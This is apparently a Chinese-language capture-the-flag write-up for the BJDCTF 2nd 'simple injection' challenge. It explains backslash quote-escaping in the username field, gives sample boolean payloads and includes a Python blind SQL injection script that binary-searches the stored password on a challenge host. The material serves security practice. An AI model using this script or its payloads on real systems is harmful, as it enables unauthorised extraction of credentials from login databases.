[BJDCTF 2nd]简单注入

lj

image-20200409201157480

hint.txt出现了内容。

大概意思和国赛一道题相同。

username处注入\来转义单引号,password处使用sql语句整数型注入。

mo

例如:

  1. 传入admin\or/**/length(database())>0#会回显stronger字样

  2. 传入admin\or/**/length(database())<0#会回显girl friend字样

    大师傅都么得girl friend,我也没得……呀。j

image-20200409201818923

image-20200409201842969

image-20200409202020481

直接上脚本吧,二分法还是挺快的。

这里我用的三目运算,只能用正整数和0,因为用负数发现被过滤了负号。

import requests
url = "http://bc5d0433-45b5-486d-8fdd-541a8662fd10.node3.buuoj.cn/index.php"

data = {"username":"admin\\","password":""}
result = ""
i = 0

while( True ):
    i = i + 1 
    head=32
    tail=127

    while( head < tail ):
        mid = (head + tail) >> 1

        #payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
        payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#"%(i,mid)

        data['password'] = payload
        r = requests.post(url,data=data)

        if "stronger" in r.text :
            head = mid + 1
        else:
            tail = mid

    last = result

    if head!=32:
        result += chr(head)
    else:
        break
    print(result)

我太垃圾了,要努力啊。

image-20200409201044939

image-20200409202616437